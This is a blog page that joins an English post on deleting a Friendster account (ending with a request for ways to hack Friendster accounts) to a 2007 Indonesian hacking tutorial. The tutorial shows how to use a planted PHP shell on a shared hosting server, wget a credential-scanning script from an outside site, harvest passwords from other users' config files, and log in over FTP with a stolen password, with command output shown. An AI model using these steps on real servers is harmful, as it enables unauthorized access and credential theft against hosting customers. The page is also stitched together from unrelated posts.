Easy busy munchy, just follow the simple steps below to delete your Friendster account.   

Log in to your existing Friendster account. Click on “settings” on
the top right hand corner of the screen. Scroll down the page and click
on the anchor “cancle account”. A new screen will appear asking for
confirmation where as you will have to enter your e-mail address and
password details. After you’ve finished, click ‘proceed’ button and
your account will be deleted.

*Please not that this change is permenant and you won’t be able to
retrieve your Friendstep account back after that. And by the way,
anyone knows how to hack a Friendster account here? Share your
knowledge buddy..

Posted
by Fuad

Dalam artikel ini kita akan mencoba mencari dan
mendapatkan password dari user yang berada pada suatu hosting server,
dengan bermodalkan shell hasil injectan kita, sapa tau kita bisa
mendapatkan password sebenarnya dari user tersebut.

CATATAN : Saya tidak bertanggung jawab atas penyalah gunaan artikel ini, semuanya hanyalah untuk proses pembelajaran

Ok, tanpa basa-basi saya mulai saja.

Yang perlu di persiapkan :

1. Seperti biasa, komputer yang terkoneksi ke internet.

2. Shell atau website hasil injectan kita. ( saya anggap rekan-rekan sudah tau gimana cara mendapatkannya )

3. Source untuk Scan file-file configurasi yang memuat informasi user dan password. dapat di download di http://wawan.22web.net/download/sConfig.txt

4. Segelas Cofeemix dan Sebungkus Sampoerna Mild. heheh

Praktek :

1. Buka Shell atau website injectan anda, ( catatan : file ini harus di upload ke dalam server yang akan kita scan user nya )

 Contoh :

http://www.xxxhosting.us/phpwebsite/images/javascript/wysiwyg/display.php

( sebelumnya saya sudah upload phpshell ke dalam server tersebut )

2. Download file sConfig.txt dari http://wawan.22web.net/download/sConfig.txt
( file ini bisa berada dimana saja dalam server target, tentunya dalam
folder yang mempunyai permission terhadap user yang kita gunakan
skarang )

 wget http://wawan.22web.net/download/sConfig.txt

##########################################################

wget wawan.22web.net/download/sConfig.txt

–03:59:52– http://wawan.22web.net/download/sConfig.txt

 => `sConfig.txt’

Resolving wawan.22web.net… done.

Connecting to wawan.22web.net[209.51.196.242]:80…

connected.

HTTP request sent, awaiting response… 200 OK

Length: unspecified [text/plain]

 0K …..

 184.39 KB/s

03:59:52 (184.39 KB/s) - `sConfig.txt’ saved [6042] #######################################################

Setelah sukses men-download file sConfig.txt, rename file tersebut menjadi sConfig.php ( source codenya dalam bentuk PHP )

3. Jalankan file tersebut,

 php sConfig.php

######################################################

mv sConfig.txt sConfig.php

php sConfig.php

Content-type: text/html

X-Powered-By: PHP/4.3.10

<html><title>Cyberbox</title><body><br><br><textarea

name=’main_window’
cols=100 rows=20>[+] Founded 224 entrys in /etc/passwd [+] Founded
224 readable public_html directories [~] Searching for passwords in
config.* files…

[+] /home/bavmus/public_html/main/include/config.php

dbbavas

[+]

/home/business/public_html/LINKEXCHANGE/siteadmin/config.php

…………………….

…………………….

[+] /home/etnkyus/public_html/config.php

133798

[FTP] etnkyus:133798 Success

…………………..

#######################################################

Bingoo
!!!, kita sudah mendapatkan 1 dari sekian banyak user yang ada dalam
server tersebut. selanjutnya kita coba connect ke server itu dengan
user dan password yang telah kita dapatkan tadi..

#######################################################

ftp> open

To xx.xx.xx.250

Connected to xx.xx.xx.250.

220———- Welcome to Pure-FTPd [TLS] ———- 220-You are user number 1 of 50 allowed.

220-Local time is now 04:19. Server port: 21.

220 You will be disconnected after 15 minutes of inactivity.

User (xx.xxx.xx.250none)): etnkyus

331 User etnkyus OK. Password required

Password:

230-User etnkyus has group access to: etnkyus 230 OK. Current restricted directory is /

ftp>

######################################################

ada kemungkinan user dan password yang sama di gunakan dalam Cpanel website tersebut, so, silahkan dicoba sendiri.

Demikian Artikel singkat saya, semoga bermanfaat, Terus Mencoba, dan jangan takut gagal.

Thank’s to :

K-159, ^BLaCk_BaNDitS^, UtUh, bigmaster, and ALL CREW in #cyberbox and #binushacker in Dal.net

Di Sudut Kamar Sepi, 2007

Wawan Firmansyah

cyberbox@telkom.net